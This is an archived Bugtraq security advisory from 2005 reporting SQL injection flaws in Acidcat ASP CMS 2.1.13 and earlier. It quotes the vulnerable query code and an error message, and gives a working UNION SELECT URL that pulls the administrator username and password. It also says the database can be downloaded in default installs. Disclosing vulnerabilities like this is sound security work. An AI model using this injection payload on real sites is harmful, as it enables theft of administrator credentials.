Home page logo

bugtraq logo Bugtraq mailing list archives

Acidcat ASP CMS Multiple Vulnerabilities
From: h e <het_ebadi () yahoo com>
Date: Tue, 20 Dec 2005 09:03:34 -0800 (PST)


Acidcat CMS is a web site and simple content
management system that can be administered via a web
It is free for non-commercial use.Acidcat CMS is also
an open source product.
The product has been found to contain multiple
security vulnerabilities allowing a remote attacker to
find administrator username and password.
Acidcat ASP CMS :http://www.acidcat.com

The information has been provided by Hamid Ebadi
(Hamid Network Security Team):admin () hamid ir 
The original article can be found at:

Vulnerable Systems:
 * Acidcat CMS v 2.1.13 and below
Example :
The following URL can be used to trigger an SQL
injection vulnerability in the main_content.asp page:

Microsoft OLE DB Provider for ODBC Drivers error
[Microsoft][ODBC Microsoft Access Driver] Syntax error
(missing operator) in query expression 'ID = 1'''. 
/main_content.asp, line 16 

Vulnerable Code:
The following lines in main_content.asp
Item.Source = "SELECT * FROM Item WHERE ID = "+
Item__MMColParam.replace(/'/g, "''") + "";

The following URL will illustrate how you can easily
find administrator username and password  by entering
the following URL:

http://localhost/acidcat/default.asp?ID=26 union
select 1,username,3,password,5,6 from Configuration
The base path of the login is :

Database Download:
The database can be downloaded over the web  (default
installation).it can be found on


Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 

  By Date           By Thread  

Current thread:
  • Acidcat ASP CMS Multiple Vulnerabilities h e (Dec 20)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]